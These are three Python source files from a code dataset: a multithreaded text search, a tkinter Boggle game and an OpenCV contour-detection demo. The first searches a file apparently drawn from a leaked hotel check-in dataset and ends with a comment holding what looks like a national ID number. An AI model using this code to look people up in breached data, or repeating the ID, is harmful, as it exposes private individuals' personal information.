+{"seq_id":"375104741","text":"import threading\nimport os\n\nclass Find(threading.Thread):\n def __init__(self,kaifanglist,istart,iend,searchstr,savefile):\n threading.Thread.__init__(self)\n self.kaifanglist=kaifanglist #开放数据的内存地址\n self.istart=istart #开始的索引\n self.iend=iend #结束的索引\n self.seachstr=searchstr #需要搜索的数据\n self.savefile=savefile #保存\n def run(self):\n self.findlist=[]\n for i in range(self.istart,self.iend):\n line=self.kaifanglist[i].decode(\"gbk\",\"ignore\") #读取一行\n if line.find(self.seachstr)!=-1:\n print(self.getName(),line,end=\"\") #搜索数据\n self.findlist.append(line) #找到加入列表\n global mutex\n with mutex: #写入\n for line in self.findlist:\n self.savefile.write(line.encode(\"utf-8\"))#写入\n\nmutex=threading.Lock() #创建一个锁\nsavefile=open(\"zhaolin.txt\",\"wb\")\n\npath = \"Z:\\\\F\\\\第一阶段视频\\\\20170424\\\\vedio\\\\大数据相关数据\\\\kaifangX.txt\"\nfile = open(path, \"rb\")\nkaifanglist = file.readlines() # 全部读入内存\nlines=len(kaifanglist)#所有的行数\nsearchstr=input(\"输入要查询的数据\")\nN=10 #开启10个线程\nthreadlist=[]\n# 97 9 0-1000000 1000000-2000000 2000000-3000000\nfor i in range(0,N-1): #0,1,2,3,4,5,6,7,8 数据切割\n mythd= Find(kaifanglist,i*(lines//(N-1)),(i+1)*(lines//(N-1)),searchstr,savefile)\n mythd.start()\n threadlist.append(mythd)\n\n#97 = 97//10*10=90\nmylastthd= Find(kaifanglist,lines//(N-1)*(N-1),lines,searchstr,savefile)\nmylastthd.start()\nthreadlist.append(mylastthd)\n\nfor thd in threadlist:\n thd.join()\n\nprint(\"finish\")\nsavefile.close() #关闭\n\n\n\n\n\n\n\n\n\n\n\n\n'''\npath = \"Z:\\\\F\\\\第一阶段视频\\\\20170424\\\\vedio\\\\大数据相关数据\\\\kaifangX.txt\"\nfile = open(path, \"rb\")\nkaifanglist = file.readlines() # 全部读入内存\nsearchstr=input(\"输入要查询的数据\")\nfinddata=Find(kaifanglist,0,len(kaifanglist),searchstr)\nfinddata.start()\nfinddata.join()\nprint(\"完工\")\n'''\n\n\n\n\n\n\n#路径\n'''\npath=\"Z:\\\\F\\\\第一阶段视频\\\\20170424\\\\vedio\\\\大数据相关数据\\\\kaifangX.txt\"\nfile=open(path,\"rb\")\nkaifanglist=file.readlines() #全部读入内存\nsearchstr=input(\"输入要查询的数据\")\nfor line in kaifanglist:\n line=line.decode(\"gbk\",\"ignore\")\n if line.find(searchstr)!=-1:\n print(line)\n'''\n\n\n#\"440102197103035617\"","sub_path":"process/threading/7多线程检索并保存.py","file_name":"7多线程检索并保存.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"62802095","text":"#! /usr/bin/env python3\n\n#######################################################################\n# #\n# The american-english and british-english dictionary files #\n# were downloaded from the below site: #\n# ---> https://www.karamasoft.com/ultimatespell/dictionary.aspx #\n# #\n#######################################################################\n\nimport sys\nif (not sys.version_info >= (3,)):\n sys.stderr.write(\"Please use Python v3.x!\\n\")\n sys.exit()\n\nimport gameboard\nimport gamesetup\nimport tkinter as tk\nimport string\nfrom pytrie.pytrie import StringTrie as trie\nimport threading\nimport time\nimport queue\nimport random\nimport os\n\n\nclass ThreadController():\n \"\"\"Defines the thread controller for the GUI\"\"\"\n\n def __init__(self, update_func, guess_time):\n \"\"\"Initializes a thread controller\"\"\"\n\n self._update = update_func\n self._time = guess_time\n self._queue_line = queue.Queue()\n self._done_time = 180\n\n self._break_threads = threading.Event()\n self._time_thread = threading.Thread(\n target=self.update_clock, name=\"Game Timer\")\n self._time_ai = threading.Thread(\n target=self.ai_play, name=\"AI Player\")\n\n def update_clock(self):\n while not self._break_threads.wait(timeout=1):\n self._done_time -= 1\n self._queue_line.put((1, self._done_time))\n self._update()\n\n def ai_play(self):\n while not self._break_threads.wait(timeout=self._time):\n self._queue_line.put((2,))\n self._update()\n\n @property\n def curr_queue(self):\n return self._queue_line\n\n @property\n def stop_event(self):\n return self._break_threads\n\n @property\n def done_time(self):\n return self._done_time\n\n def start_timer(self):\n self._time_thread.start()\n\n def start_ai(self):\n self._time_ai.start()\n\n def stop_threads(self):\n self._break_threads.set()\n\n def reset_threads(self):\n self._break_threads.clear()\n\n def destroy_threads(self):\n try:\n if self._time_thread.isAlive():\n self._time_thread.join(timeout=None)\n if self._time_ai.isAlive():\n self._time_ai.join(timeout=None)\n except AttributeError:\n pass\n else:\n self._time_thread = None\n self._time_ai = None\n\n\nclass Boggle(tk.Tk):\n \"\"\"Defines the window display for the Boggle GUI\"\"\"\n\n def __init__(self, master):\n \"\"\"Initializes a new window\"\"\"\n\n super().__init__(master)\n self.wm_title(\"BOGGLE\")\n self.geometry(\"{0}x{1}+{2}+{3}\".format(700, 400, 50, 100))\n self.resizable(0, 0)\n self.configure(background=\"steelblue1\")\n\n self.grid()\n\n self.left = tk.Frame(self, bg=\"steelblue1\", width=200, height=400)\n self.left.grid(row=0, column=0)\n\n self.middle = tk.Frame(self, bg=\"steelblue1\", width=300, height=400)\n self.middle.grid(row=0, column=1)\n\n self.right = tk.Frame(self, bg=\"steelblue1\", width=200, height=400)\n self.right.grid(row=0, column=2)\n\n self.createSubWindow()\n if os.name != \"posix\":\n self.default_dict = \"american-english\"\n else:\n self.default_dict = \"/usr/share/dict/words\"\n self.comp_guess_time = 7\n self.createGameOptions()\n if self.result is False:\n self.destroy()\n else:\n self.protocol(\"WM_DELETE_WINDOW\", self.close_game)\n self.human_player = gameboard.Player()\n self.comp_player = gameboard.Player()\n self.human_score = tk.IntVar()\n self.comp_score = tk.IntVar()\n self.initialize_game()\n\n #################################\n # #\n # GAME INITIALIZATION #\n # #\n #################################\n\n def initialize_game(self):\n self.createGameSetup()\n self.controller = ThreadController(\n self.processQueueItems, self.comp_guess_time)\n self.human_score.set(self.human_player.score)\n self.comp_score.set(self.comp_player.score)\n self.time_left = tk.StringVar()\n self.time_left.set(\"{0:02d}:{1:02d}:{2:02d}\".format(\n self.controller.done_time // 3600,\n self.controller.done_time // 60,\n self.controller.done_time % 60))\n self.createWidgets()\n self.running = False\n self.mid_game = True\n self.createGameReady()\n\n #####################################\n # #\n # RUNNING GAME FUNCTIONS #\n # #\n #####################################\n\n def get_random_word(self):\n if len(self.words_on_board) > 1:\n rand_idx = random.choice(range(0, len(self.words_on_board) - 1))\n else:\n rand_idx = 0\n\n ai_guess = self.words_on_board[rand_idx]\n return ai_guess\n\n def get_best_scoring_word(self, word):\n highest_exp = 0\n poss_picks = []\n found = False\n for pair in self.words_on_board:\n if pair[0] == word:\n found = True\n poss_picks.append(pair)\n if pair[1] > highest_exp:\n highest_exp = pair[1]\n if found is False:\n return False\n\n for pick in poss_picks:\n self.words_on_board.remove(pick)\n return highest_exp\n\n def processQueueItems(self):\n while self.controller.curr_queue.qsize():\n try:\n thread = self.controller.curr_queue.get_nowait()\n if len(self.words_on_board) == 0:\n with self.controller.curr_queue.mutex:\n self.controller.curr_queue.queue.clear()\n self.stop_game()\n break\n\n if thread[0] == 1:\n self.time_left.set(\"{0:02d}:{1:02d}:{2:02d}\".format(\n thread[1] // 3600, thread[1] // 60,\n thread[1] % 60))\n if thread[1] == 0:\n self.stop_game()\n break\n else:\n ai_guess = self.get_random_word()\n double_word = self.get_best_scoring_word(ai_guess[0])\n self.board.award_pts(\n ai_guess[0], self.comp_player,\n self.running, double_word)\n self.comp_score.set(self.comp_player.score)\n self.update_guesses(ai_guess[0].upper(), 1)\n self.update_idletasks()\n except queue.Empty:\n pass\n\n def ongoing_game(self):\n self.processQueueItems()\n\n def stop_game(self):\n self.controller.stop_threads()\n self.entry_box.config(state=\"disabled\")\n self.clear_button.configure(\n fg=\"cyan\", bg=\"darkorchid3\", state=\"disabled\")\n for button in self.buttons:\n button[0].configure(state=\"disabled\")\n self.filemenu.entryconfig(1, state=\"normal\")\n self.editmenu.entryconfig(1, state=\"normal\")\n self.editmenu.entryconfig(2, state=\"normal\")\n self.running = False\n self.mid_game = False\n self.createWinnerCircle()\n\n def start_game(self):\n self.deiconify()\n self.entry_box.config(state=\"normal\")\n for button in self.buttons:\n button[0].configure(state=\"normal\")\n self.entry_box.focus_set()\n self.filemenu.entryconfig(1, state=\"disabled\")\n self.editmenu.entryconfig(1, state=\"disabled\")\n self.editmenu.entryconfig(2, state=\"disabled\")\n self.clear_button.configure(\n fg=\"cyan\", bg=\"darkorchid3\", state=\"normal\")\n self.controller.start_timer()\n self.controller.start_ai()\n self.running = True\n self.begin.destroy()\n self.double_word_score = 0\n self.after(1000, self.ongoing_game)\n\n def get_word(self):\n word = self.entry_box.get().lower()\n self.textarea.insert(tk.END, \"\\n\"+word)\n self.entry_box.delete(0, tk.END)\n if len(self.words_on_board) == 0:\n self.stop_game()\n return 0\n\n double_word = self.get_best_scoring_word(word)\n if double_word is not False:\n self.board.award_pts(\n word, self.human_player, self.running, double_word)\n self.human_score.set(self.human_player.score)\n self.update_guesses(word, 2)\n self.reset_buttons()\n\n def strip_dictionary(self, filename):\n try:\n with open(filename, 'r') as input_words:\n trie_dictionary = trie()\n for line in input_words:\n line = line.strip()\n if line.isupper() or line.istitle():\n continue\n elif line.isalpha():\n if string.ascii_uppercase.count(line[0]):\n continue\n elif len(line) == 17:\n line = line.lower()\n if line.count(\"qu\"):\n trie_dictionary[line] = 1\n else:\n continue\n elif len(line) < 3 or len(line) > 17:\n continue\n else:\n trie_dictionary[line] = 1\n else:\n continue\n return trie_dictionary\n except FileNotFoundError:\n return False\n\n def get_dictionary(self):\n try:\n if self.path.winfo_exists():\n self.default_dict = self.path.get()\n except AttributeError:\n pass\n self.comp_guess_time = self.options.scale.get()\n filename = self.default_dict\n res = self.strip_dictionary(filename)\n if res is False:\n import tkinter.messagebox as tkmb\n\n def error():\n tkmb.showinfo(\"ERROR\", \"{0} NOT FOUND\".format(filename))\n error()\n self.result = False\n else:\n self.dictionary = res\n self.options.destroy()\n\n def lookup_word(self, word):\n return self.dictionary.get(word, 0)\n\n def update_guesses(self, word, player_no):\n self.guess_entry.config(state=\"normal\")\n if player_no == 1:\n self.guess_entry.configure(fg=\"darkorchid3\")\n self.guess_entry.insert(\"end\", word + '\\n')\n self.guess_entry.configure(fg=\"black\")\n else:\n self.guess_entry.insert(\"end\", word + '\\n')\n self.guess_entry.see(tk.END)\n self.guess_entry.config(state=\"disabled\")\n\n def type_letter(self, pos):\n button_pos = (pos.x_coord * 4) + pos.y_coord\n self.buttons[button_pos][0].configure(bg=\"yellow\")\n self.buttons[button_pos][0].config(state=\"disabled\")\n self.entry_box.insert(\"end\", pos.letter)\n\n def reset_buttons(self):\n self.entry_box.delete(0, tk.END)\n for button in self.buttons:\n if button[1]:\n button[0].configure(bg=\"lavender\", fg=\"red\", state=\"normal\")\n else:\n button[0].configure(\n bg=\"lavender\", fg=\"darkorchid3\", state=\"normal\")\n\n def close_game(self):\n if self.mid_game is True and self.running is True:\n self.running = False\n self.controller.stop_threads()\n self.controller.destroy_threads()\n self.destroy()\n\n def reset_game(self):\n try:\n self.win_circ.destroy()\n except AttributeError:\n pass\n\n try:\n self.begin.destroy()\n except AttributeError:\n pass\n\n try:\n if self.options.winfo_exists():\n self.options.lift(aboveThis=self)\n return 0\n except AttributeError:\n pass\n\n self.withdraw()\n self.human_player.score = 0, self.running\n self.comp_player.score = 0, self.running\n self.controller.reset_threads()\n self.controller.destroy_threads()\n self.guess_box.destroy()\n self.initialize_game()\n\n ###################################\n # #\n # SETUP GAME FUNCTIONS #\n # #\n ###################################\n\n #############################\n # #\n # GAME SUBWINDOWS #\n # #\n #############################\n\n def __CancelCommand(self, event=None):\n pass\n\n def createSubWindow(self):\n self.intro = tk.Toplevel(bg=\"darkslategray1\")\n self.intro.geometry(\"{0}x{1}+{2}+{3}\".format(400, 250, 195, 175))\n self.intro.wm_title(\"BOGGLE INTRO\")\n self.intro.resizable(0, 0)\n self.intro.lift(aboveThis=self)\n self.withdraw()\n self.msg = \"Welcome to the BOGGLE word game! This program simulates \"\\\n \"the 16-dice set version of Boggle distributed by Hasbro \"\\\n \"Gaming. This version has 1 cube with 'Qu' on one of the sides. \"\\\n \"Words that include the letter 'q' without a following 'u' \"\\\n \"cannot be formed using this version of the game.\\n\\n\"\\\n \"This game is for educational purposes only.\"\n self.lab = tk.Label(\n self.intro, text=self.msg, anchor=tk.CENTER, justify=tk.LEFT,\n wraplength=300, font=(\"Arial\", 9, \"bold\"), fg=\"blue\",\n bg=\"darkslategray1\")\n self.lab.pack(side=\"top\", pady=50)\n self.button = tk.Button(\n self.intro, text=\"OK\", width=4, height=1,\n font=(\"Arial\", 10, \"bold\"), fg=\"blue\", command=self.intro.destroy)\n self.button.pack(side=\"top\")\n self.intro.focus_force()\n self.wait_window(self.intro)\n\n def createGameOptions(self):\n try:\n self.begin.destroy()\n except AttributeError:\n pass\n\n try:\n if self.options.winfo_exists():\n self.options.lift(aboveThis=self)\n return 0\n except AttributeError:\n pass\n\n self.options = tk.Toplevel(bg=\"darkslategray1\")\n self.options.geometry(\"{0}x{1}+{2}+{3}\".format(400, 325, 195, 150))\n self.options.wm_title(\"BOGGLE OPTIONS\")\n self.options.resizable(0, 0)\n self.options.lift(aboveThis=self)\n self.options.protocol(\"WM_DELETE_WINDOW\", self.__CancelCommand)\n\n self.result = True\n self.options.grid()\n self.options.top = tk.Frame(\n self.options, bg=\"darkslategray1\", width=400, height=75)\n self.options.top.grid(row=0, column=0)\n self.options.scale_label = tk.Label(\n self.options.top, text=\"Computer Guess Time (sec):\",\n font=(\"Arial\", 9, \"bold\"), fg=\"cyan\", bg=\"darkorchid3\")\n self.options.scale_label.place(relx=0.5, rely=0.3, anchor=tk.CENTER)\n self.options.scale = tk.Scale(\n self.options.top, from_=5, to=9, orient=tk.HORIZONTAL)\n self.options.scale.set(self.comp_guess_time)\n self.options.scale.place(relx=0.5, rely=0.75, anchor=tk.CENTER)\n\n self.options.bottom = tk.Frame(\n self.options, bg=\"darkslategray1\", width=400, height=250)\n self.options.bottom.grid(row=1, column=0)\n\n def sel():\n infile_dict = str(self.tmp_def.get())\n try:\n if self.options.sel_label.winfo_exists():\n self.options.sel_label.destroy()\n except AttributeError:\n pass\n\n try:\n if infile_dict != \"other\":\n self.path.destroy()\n except AttributeError:\n pass\n\n self.default_dict = infile_dict\n if infile_dict == \"other\":\n self.path = tk.Entry(\n self.options.bottom, width=20, font=(\"Arial\", 10))\n self.path.focus_set()\n self.path.place(relx=0.5, rely=0.7, anchor=tk.CENTER)\n\n selection = \"You selected the \" + infile_dict + \" dictionary.\"\n self.options.sel_label = tk.Label(\n self.options.bottom, anchor=tk.CENTER,\n font=(\"Arial\", 9, \"bold\"), fg=\"darkorchid3\", text=selection)\n self.options.sel_label.place(relx=0.5, rely=0.8, anchor=tk.CENTER)\n\n self.dict_label = tk.Label(\n self.options.bottom, text=\"Dictionary Choices:\",\n font=(\"Arial\", 9, \"bold\"), fg=\"cyan\", bg=\"darkorchid3\")\n self.dict_label.place(relx=0.5, rely=0.15, anchor=tk.N)\n\n self.tmp_def = tk.StringVar()\n if (self.default_dict == \"american-english\"\n or self.default_dict == \"british-english\"\n or self.default_dict == \"/usr/share/dict/words\"):\n self.tmp_def.set(self.default_dict)\n else:\n self.tmp_def.set(\"other\")\n self.path = tk.Entry(\n self.options.bottom, width=20, font=(\"Arial\", 10))\n self.path.place(relx=0.5, rely=0.7, anchor=tk.CENTER)\n self.path.insert(\"end\", self.default_dict)\n\n self.options.b1 = tk.Radiobutton(\n self.options.bottom, text=\"American-English\", bg=\"darkslategray1\",\n variable=self.tmp_def, value=\"american-english\", command=sel)\n self.options.b1.place(relx=0.5, rely=0.275, anchor=tk.CENTER)\n\n self.options.b2 = tk.Radiobutton(\n self.options.bottom, text=\"British-English\", bg=\"darkslategray1\",\n variable=self.tmp_def, value=\"british-english\", command=sel)\n self.options.b2.place(relx=0.5, rely=0.375, anchor=tk.CENTER)\n\n self.options.b4 = tk.Radiobutton(\n self.options.bottom, text=\"Other\", bg=\"darkslategray1\",\n variable=self.tmp_def, value=\"other\", command=sel)\n self.options.b4.place(relx=0.5, rely=0.575, anchor=tk.CENTER)\n\n if os.name == \"posix\":\n self.options.b3 = tk.Radiobutton(\n self.options.bottom, text=\"Linux Words\", bg=\"darkslategray1\",\n variable=self.tmp_def, value=\"/usr/share/dict/words\",\n command=sel)\n self.options.b3.place(relx=0.5, rely=0.475, anchor=tk.CENTER)\n\n self.options.done_button = tk.Button(\n self.options.bottom, text=\"DONE\", width=6, height=1,\n font=(\"Arial\", 10, \"bold\"), fg=\"cyan\",\n command=self.get_dictionary, bg=\"darkorchid3\")\n self.options.done_button.place(relx=0.5, rely=0.93, anchor=tk.CENTER)\n self.wait_window(self.options)\n\n def createGameSetup(self):\n self.game_setup = tk.Toplevel(bg=\"darkslategray1\")\n self.game_setup.geometry(\"{0}x{1}+{2}+{3}\".format(250, 65, 275, 175))\n self.game_setup.wm_title(\"BOGGLE SETUP\")\n self.game_setup.resizable(0, 0)\n self.game_setup.lift(aboveThis=self)\n self.game_setup.protocol(\"WM_DELETE_WINDOW\", self.__CancelCommand)\n self.info = tk.Label(\n self.game_setup, anchor=tk.CENTER,\n text=\"Setting up the game, please wait....\",\n font=(\"Arial\", 9, \"bold\"), fg=\"blue\", bg=\"darkslategray1\")\n self.info.pack(side=\"top\", pady=20)\n self.game_setup.after(\n 500, func=lambda: gamesetup.build_all_words(self))\n self.wait_window(self.game_setup)\n\n def createGameReady(self):\n self.begin = tk.Toplevel(bg=\"darkslategray1\")\n self.begin.geometry(\"{0}x{1}+{2}+{3}\".format(150, 75, 325, 300))\n self.begin.wm_title(\"READY\")\n self.begin.resizable(0, 0)\n self.begin.lift(aboveThis=self)\n self.begin.protocol(\"WM_DELETE_WINDOW\", self.__CancelCommand)\n self.begin.focus_force()\n self.start_button = tk.Button(self.begin, command=self.start_game)\n self.start_button.configure(\n text=\"Start\", font=(\"Arial\", 10, \"bold\"), bg=\"darkorchid3\",\n fg=\"cyan\", padx=50)\n self.start_button.pack(side=tk.TOP, pady=20)\n self.wait_window(self.begin)\n\n def createWinnerCircle(self):\n self.win_circ = tk.Toplevel(bg=\"darkslategray1\")\n self.win_circ.geometry(\"{0}x{1}+{2}+{3}\".format(260, 150, 275, 250))\n self.win_circ.resizable(0, 0)\n self.win_circ.lift(aboveThis=self)\n self.win_circ.focus_force()\n if self.human_player.score > self.comp_player.score:\n self.win_circ.wm_title(\"WINNER'S CIRCLE\")\n self.msg = \"CONGRATULATIONS! You are the master! \\n\\n Play again?\"\n else:\n self.win_circ.wm_title(\"LOSER'S CIRCLE\")\n self.msg = \"YOU LOSE! Sad face... \\n\\n Play again?\"\n self.win_info = tk.Label(\n self.win_circ, anchor=tk.CENTER, text=self.msg,\n font=(\"Arial\", 9, \"bold\"), fg=\"blue\", bg=\"darkslategray1\")\n self.win_info.place(relx=0.5, rely=0.2, anchor=tk.CENTER)\n self.play_yes = tk.Button(\n self.win_circ, command=self.reset_game, width=4, height=1)\n self.play_yes.configure(\n text=\"YES\", font=(\"Arial\", 9, \"bold\"), bg=\"darkorchid3\", fg=\"cyan\")\n self.play_yes.place(relx=0.35, rely=0.5, anchor=tk.CENTER)\n self.play_no = tk.Button(\n self.win_circ, command=self.close_game, width=4, height=1)\n self.play_no.configure(\n text=\"NO\", font=(\"Arial\", 9, \"bold\"), bg=\"darkorchid3\", fg=\"cyan\")\n self.play_no.place(relx=0.65, rely=0.5, anchor=tk.CENTER)\n self.config_msg = \"To reconfigure, close this window and select \"\\\n \"option to reconfigure from 'Configure' tab. When done, \"\\\n \"select new game from 'File' tab.\"\n self.win_reconfig = tk.Label(\n self.win_circ, anchor=tk.CENTER, text=self.config_msg,\n justify=tk.LEFT, wraplength=240, font=(\"Arial\", 7, \"bold\"),\n fg=\"firebrick1\", bg=\"darkslategray1\")\n self.win_reconfig.place(relx=0.5, rely=0.8, anchor=tk.CENTER)\n\n ##########################\n # #\n # GAME WIDGETS #\n # #\n ##########################\n\n def setupMenu(self):\n # Setting up the menu bar\n self.menubar = tk.Menu(self, bg=\"cyan\", fg=\"blue\")\n self.config(menu=self.menubar)\n\n self.filemenu = tk.Menu(self.menubar)\n self.filemenu.add_command(\n label=\"New Game\", command=self.reset_game, font=(\"Arial\", 8))\n self.filemenu.add_command(\n label=\"Quit Game\", command=self.close_game, font=(\"Arial\", 8))\n self.menubar.add_cascade(\n label=\"File\", menu=self.filemenu, font=(\"Arial\", 10, \"bold\"))\n\n self.editmenu = tk.Menu(self.menubar)\n self.editmenu.add_command(\n label=\"Change Time Interval\", command=self.createGameOptions,\n font=(\"Arial\", 8))\n self.editmenu.add_command(\n label=\"Change Dictionary\", command=self.createGameOptions,\n font=(\"Arial\", 8))\n self.menubar.add_cascade(\n label=\"Configure\", menu=self.editmenu, font=(\"Arial\", 10, \"bold\"))\n\n def setupLeftPane(self):\n # Add text box for guessed words\n self.guess_box = tk.Frame(self.left, height=50, width=50, bg=\"cyan\")\n scrollbar = tk.Scrollbar(self.guess_box)\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n self.label_box = tk.Label(\n self.guess_box, text=\"SOLVED WORDS:\", font=(\"Arial\", 8, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.label_box.pack(side=tk.TOP)\n self.guess_entry = tk.Text(\n self.guess_box, yscrollcommand=scrollbar.set,\n state=\"disabled\", width=25, height=25, font=(\"Arial\", 8))\n self.guess_entry.pack(side=tk.RIGHT)\n scrollbar.config(command=self.guess_entry.yview)\n self.guess_box.place(relx=0.5, rely=0.5, anchor=tk.CENTER)\n\n def setupMiddlePane(self):\n # Setting up the image display\n ##########################################################\n # #\n # The below boggle image was pulled from the below site, #\n # cropped down, and recolored to match my color pattern #\n # --> http://shop.tpet.co.uk/boggle-interactive-game #\n # #\n ##########################################################\n\n self.mainimg = tk.PhotoImage(file=\"gameimage.gif\")\n self.pic_label = tk.Label(\n self.middle, width=250, height=65, bg=\"steelblue1\",\n image=self.mainimg)\n self.pic_label.place(relx=0.5, rely=0.09, anchor=tk.CENTER)\n\n # Setting up the board display\n self.board_grid = tk.Frame(self.middle, height=390, width=390)\n self.buttons = []\n\n for pos in self.board.current_board:\n if pos.flag:\n b = tk.Button(\n self.board_grid, text=pos.letter,\n font=(\"Arial\", 12, \"bold\"), height=3, width=6, fg=\"red\",\n state=\"disabled\", bg=\"lavender\",\n command=lambda pos=pos: self.type_letter(pos))\n else:\n b = tk.Button(\n self.board_grid, text=pos.letter,\n font=(\"Arial\", 12, \"bold\"), height=3, width=6,\n fg=\"darkorchid3\", state=\"disabled\", bg=\"lavender\",\n command=lambda pos=pos: self.type_letter(pos))\n self.buttons.append((b, pos.flag))\n b.grid(row=pos.x_coord, column=pos.y_coord)\n\n self.board_grid.pack_propagate(0)\n self.board_grid.place(relx=0.5, rely=0.53, anchor=tk.CENTER)\n\n # Add text box for user to type in words\n self.word_box = tk.Frame(self.middle, height=500, width=500)\n self.label_box = tk.Label(\n self.word_box, text=\"Input Word:\", font=(\"Arial\", 10, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.label_box.pack(side=tk.LEFT)\n self.entry_box = tk.Entry(\n self.word_box, width=20, font=(\"Arial\", 10), state=\"disabled\")\n self.entry_box.pack(side=tk.RIGHT)\n self.textarea = tk.Text(self.entry_box, width=20, height=20)\n self.entry_box.bind(\"\", lambda x: self.get_word())\n self.word_box.place(relx=0.5, rely=0.93, anchor=tk.CENTER)\n\n def setupRightPane(self):\n # Add score box for human player\n self.h_score_box = tk.Frame(\n self.right, height=50, width=50, bg=\"cyan\")\n self.h_label = tk.Label(\n self.h_score_box, text=\"YOUR SCORE:\", font=(\"Arial\", 9, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.h_label.pack(side=tk.TOP)\n self.h_text = tk.Label(\n self.h_score_box, width=15, height=1,\n font=(\"Arial\", 9), textvariable=self.human_score, bg=\"white\")\n self.h_text.pack(side=tk.RIGHT)\n self.h_score_box.place(relx=0.5, rely=0.3, anchor=tk.CENTER)\n\n # Add score box for computer player\n self.c_score_box = tk.Frame(self.right, height=50, width=50, bg=\"cyan\")\n self.c_label = tk.Label(\n self.c_score_box, text=\"COMP SCORE:\", font=(\"Arial\", 9, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.c_label.pack(side=tk.TOP)\n self.c_text = tk.Label(\n self.c_score_box, width=15, height=1,\n font=(\"Arial\", 9), textvariable=self.comp_score, bg=\"white\")\n self.c_text.pack(side=tk.RIGHT)\n self.c_score_box.place(relx=0.5, rely=0.5, anchor=tk.CENTER)\n\n # Add clear button\n self.clear_button = tk.Button(\n self.right, text=\"CLEAR\", font=(\"Arial\", 10, \"bold\"),\n bg=\"darkorchid3\", fg=\"cyan\", height=2,\n width=6, state=\"disabled\", command=self.reset_buttons)\n self.clear_button.pack(side=tk.RIGHT)\n self.clear_button.place(relx=0.5, rely=0.7, anchor=tk.CENTER)\n\n # timer countdown display\n self.timer = tk.Frame(self.right, height=50, width=50, bg=\"cyan\")\n self.timer_label = tk.Label(\n self.timer, text=\"REMAINING TIME:\", font=(\"Arial\", 12, \"bold\"),\n bg=\"cyan\", fg=\"blue\")\n self.timer_label.pack(side=tk.TOP)\n self.time = tk.Label(\n self.timer, width=17, height=1,\n font=(\"Arial\", 12, \"bold\"), bg=\"white\")\n self.time.configure(textvariable=self.time_left)\n self.time.pack(side=tk.RIGHT)\n self.timer.place(relx=0.5, rely=0.9, anchor=tk.CENTER)\n\n def createWidgets(self):\n \"\"\"Creates the differents pieces of the Application GUI\"\"\"\n\n self.setupMenu()\n self.setupLeftPane()\n self.setupMiddlePane()\n self.setupRightPane()\n\n\n# Game Loop\napp = Boggle(None)\napp.mainloop()\n","sub_path":"boggle.py","file_name":"boggle.py","file_ext":"py","file_size_in_byte":29055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"419201314","text":"import cv2\nimport cv2 as cv\nimport numpy as np\n##image stacking\ndef stackImages(scale, imgArray):\n rows = len(imgArray)\n cols = len(imgArray[0])\n rowsAvailable = isinstance(imgArray[0], list)\n width = imgArray[0][0].shape[1]\n height = imgArray[0][0].shape[0]\n if rowsAvailable:\n for x in range(0, rows):\n for y in range(0, cols):\n if imgArray[x][y].shape[:2] == imgArray[0][0].shape[:2]:\n imgArray[x][y] = cv.resize(imgArray[x][y], (0, 0), None, scale, scale)\n else:\n imgArray[x][y] = cv.resize(imgArray[x][y], (imgArray[0][0].shape[1], imgArray[0][0].shape[0]),\n None, scale, scale)\n if len(imgArray[x][y].shape) == 2: imgArray[x][y] = cv.cvtColor(imgArray[x][y], cv.COLOR_GRAY2BGR)\n imageBlank = np.zeros((height, width, 3), np.uint8)\n hor = [imageBlank] * rows\n hor_con = [imageBlank] * rows\n for x in range(0, rows):\n hor[x] = np.hstack(imgArray[x])\n ver = np.vstack(hor)\n else:\n for x in range(0, rows):\n if imgArray[x].shape[:2] == imgArray[0].shape[:2]:\n imgArray[x] = cv.resize(imgArray[x], (0, 0), None, scale, scale)\n else:\n imgArray[x] = cv.resize(imgArray[x], (imgArray[0].shape[1], imgArray[0].shape[0]), None, scale, scale)\n if len(imgArray[x].shape) == 2: imgArray[x] = cv.cvtColor(imgArray[x], cv.COLOR_GRAY2BGR)\n hor = np.hstack(imgArray)\n ver = hor\n return ver\npath = './images/shapes.png'\nimg = cv.imread(path)\n\nprint(img.shape)\n\ndef getcontour(img):\n contour,hierarchy=cv.findContours(img,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_NONE)\n for cnt in contour:\n area=cv.contourArea(cnt) #####getting contour area\n\n if area>1000:\n cv.drawContours(imgcontour, cnt, -1, (255, 0, 0), 1)####drawing contours\n print(area)\n peri=cv.arcLength(cnt,True) ####getting perimeter\n print(peri)\n approx=cv.approxPolyDP(cnt,.02*peri,True) ####getting no. of corners\n print(len(approx))\n ####getting bounding box.\n objcor=len(approx)\n x, y, w, h =cv.boundingRect(approx)\n cv.rectangle(imgcontour,(x,y),(x+w,y+h),(0,0,0),3)\n\n #####identifying object according to corners\n if objcor ==3: objecttype=\"tri\"\n elif objcor==4:\n aspRatio = w / float(h)\n if aspRatio > 0.98 and aspRatio < 1.03:\n objecttype = \"Square\"\n else:\n objecttype = \"Rectangle\"\n\n else : objecttype=\"circle\"\n cv.putText(imgcontour,objecttype,(x+(w//2)-10,y+(h//2)-10),cv2.FONT_HERSHEY_COMPLEX,0.5,\n (0,0,0),2)\n\n\n\nimg = img[5:253,3:194]\nim_gray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\nim_blur=cv.GaussianBlur(im_gray,(3,5),0)\nim_canny=cv.Canny(im_gray,50,50)\nim_blank=np.zeros_like(img)\nimgcontour=img.copy()\ngetcontour(im_canny)\nimgstack=stackImages(0.9,([img,im_gray,im_blur,],[im_canny,imgcontour,im_blank]))\ncv.imshow(\"image\",imgstack)\n# cv.imshow(\"gray\",im_gray)\n# cv.imshow(\"blur\",im_blur)\ncv.waitKey(0)","sub_path":"ContourDetection/contour detection.py","file_name":"contour detection.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
